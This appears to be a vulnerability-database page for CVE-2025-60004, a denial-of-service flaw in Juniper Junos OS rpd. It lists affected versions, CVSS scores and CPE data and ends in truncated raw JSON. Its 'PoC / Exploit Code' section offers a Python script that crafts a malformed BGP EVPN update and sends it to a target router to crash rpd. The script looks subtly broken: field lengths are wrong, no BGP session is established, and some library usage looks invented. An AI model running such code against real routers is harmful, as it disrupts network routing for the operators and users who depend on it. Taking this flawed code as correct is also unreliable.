Security Vulnerability Report
CVE-2025-60004 CVSS 7.5 HIGH

Published: 2025-10-09 17:16:04
Last Modified: 2026-01-23 19:38:03

Description

An Improper Check for Unusual or Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial-Of-Service (DoS).

When an affected system receives a specific BGP EVPN update message over an established BGP session, this causes an rpd crash and restart.

A BGP EVPN configuration is not necessary to be vulnerable. If peers are not configured to send BGP EVPN updates to a vulnerable device, then this issue can't occur.

This issue affects iBGP and eBGP, over IPv4 and IPv6.

This issue affects:

Junos OS:
 * 23.4 versions from 23.4R2-S3 before 23.4R2-S5,
 * 24.2 versions from 24.2R2 before 24.2R2-S1,
 * 24.4 versions before 24.4R1-S3, 24.4R2;

Junos OS Evolved:
 * 23.4-EVO versions from 23.4R2-S2-EVO before 23.4R2-S5-EVO,
 * 24.2-EVO versions from 24.2R2-EVO before 24.2R2-S1-EVO,
 * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:23.4:r2-s3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:23.4:r2-s4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:24.2:r2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:24.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:24.4:r1:*:*:*:*:*:* - VULNERABLE
Junos OS 23.4R2-S3 <= version < 23.4R2-S5
Junos OS 24.2R2 <= version < 24.2R2-S1
Junos OS version < 24.4R1-S3
Junos OS version < 24.4R2
Junos OS Evolved 23.4R2-S2-EVO <= version < 23.4R2-S5-EVO
Junos OS Evolved 24.2R2-EVO <= version < 24.2R2-S1-EVO
Junos OS Evolved version < 24.4R1-S3-EVO
Junos OS Evolved version < 24.4R2-EVO

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60004 PoC - Juniper Junos OS rpd DoS via Malicious BGP EVPN Update
# This PoC demonstrates triggering an rpd crash by sending a crafted BGP EVPN update
# Requires: scapy or similar packet crafting library, and an established BGP session
from scapy.all import *
from scapy.layers.inet import IP, TCP
from scapy.contrib.bgp import BGPHeader, BGPUpdate, BGPNLRI
import socket
import struct

TARGET_IP = "192.168.1.1"  # Target Juniper device IP
TARGET_PORT = 179  # BGP port
LOCAL_IP = "10.0.0.1"  # Local BGP peer IP
LOCAL_PORT = 12345  # Local source port

def craft_malicious_evpn_update():
    """
    Craft a malicious BGP UPDATE message containing a malformed EVPN NLRI
    that triggers improper exception handling in rpd, causing a crash.
    """
    # BGP EVPN uses AFI 25 (L2VPN) and SAFI 70 (EVPN)
    evpn_afi = 25
    evpn_safi = 70

    # Build a malformed EVPN route with abnormal/exceptional conditions
    # EVPN Route Type 2 (MAC/IP Advertisement) with invalid length
    route_type = 0x02  # MAC/IP Advertisement route

    # Construct an intentionally malformed NLRI to trigger exception
    # Invalid RD (Route Distinguisher) length or malformed MAC length
    malformed_nlri = bytes([
        route_type,  # Route Type
        0xFF, 0xFF,  # Invalid length field (triggers exception)
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # RD (Route Distinguisher)
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  # Ethernet Segment ID
        0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # MAC Address (malformed)
        0x00,  # Invalid MAC length
        0x00, 0x00, 0x00, 0x00,  # IP Address
        0x00, 0x00, 0x00, 0x00,  # Labels
    ])

    # Build BGP UPDATE message
    mp_reach_nlri = struct.pack('!BB', evpn_afi, evpn_safi)
    mp_reach_nlri += struct.pack('!B', 12)  # Length of next hop (IPv4)
    mp_reach_nlri += socket.inet_aton(LOCAL_IP)  # Next hop
    mp_reach_nlri += struct.pack('!B', 0)  # Number of SNPAs
    mp_reach_nlri += struct.pack('!H', len(malformed_nlri))  # NLRI length
    mp_reach_nlri += malformed_nlri

    bgp_update = BGPUpdate()
    bgp_update.mp_reach_nlri = mp_reach_nlri
    return bytes(bgp_update)

def send_malicious_update():
    """Send the crafted BGP EVPN update to the target"""
    payload = craft_malicious_evpn_update()

    # Establish TCP connection to BGP port
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    try:
        sock.connect((TARGET_IP, TARGET_PORT))
        print(f"[+] Connected to {TARGET_IP}:{TARGET_PORT}")

        # Send BGP OPEN message (simplified - real attack requires established session)
        # In practice, attacker would need a configured BGP session
        print("[*] Sending malicious BGP EVPN UPDATE...")
        sock.send(payload)
        print(f"[+] Malicious EVPN update sent ({len(payload)} bytes)")
        print("[*] Target rpd should crash and restart, causing DoS")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-60004 - Juniper Junos OS rpd DoS PoC")
    print("BGP EVPN Malformed Update Attack")
    print("=" * 60)
    send_malicious_update()

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60004", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:03.673", "lastModified": "2026-01-23T19:38:03.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial-Of-Service (DoS).\n\nWhen an affected system receives a specific BGP EVPN update message over an established BGP session, this causes an rpd crash and restart.\n\nA BGP EVPN configuration is not necessary to be vulnerable. If peers are not configured to send BGP EVPN updates to a vulnerable device, then this issue can't occur.\n\nThis issue affects iBGP and eBGP, over IPv4 and IPv6.\n\n\nThis issue affects:\nJunos OS:\n * 23.4 versions from \n\n23.4R2-S3 before 23.4R2-S5,\n * 24.2 versions from \n\n24.2R2 \n\nbefore 24.2R2-S1,\n * 24.4 versions before 24.4R1-S3, 24.4R2;\n\n\n\nJunos OS Evolved:\n * 23.4-EVO versions from 23.4R2-S2-EVO before 23.4R2-S5-EVO,\n * 24.2-EVO versions from 24.2R2-EVO before 24.2R2-S1-EVO,\n * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", 
"confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "A7C207E3-0252-4192-8E8C-E2ED2831B4F4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2-s4:*:*:*:*:*:*", "matchCriteriaId": "E6974492-FE69-4340-8881-61C3329C1545"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.2:r2:*:*:*:*:*:*", "matchCriteriaId": "266B520A-482A-43F7-90F8-B9D64D30034F"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:juniper:junos:24.4:-:*:*:*:*:*:*", "matchCriteriaId": "C452BDCB-34E3-42D3-8909-2312356EB70A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r1:*:*:*:*:*:*", "matchCriteriaId": "2B8158F2-2028-40E9-955F-CFD581A32F60"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "1A7233A1-EC7A-4458-9AE1-835480A03A21"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r2:*:*:*:*:*:*", "matchCriteriaId": "0EEF1798-F3C2-4645-96E7-1E82368B184D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "EB2FE5FE-0ADE-406E-A23D-FDCC104B2496"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "2E58987A-D7B7-4FFF-9969-E8FD76AE2BE3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r2-s4:*:*:*:*:*:*", "matchCriteriaId": "E779C0D4-A8F7-4976-B3C8-B9802B96E715"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolv ... (truncated)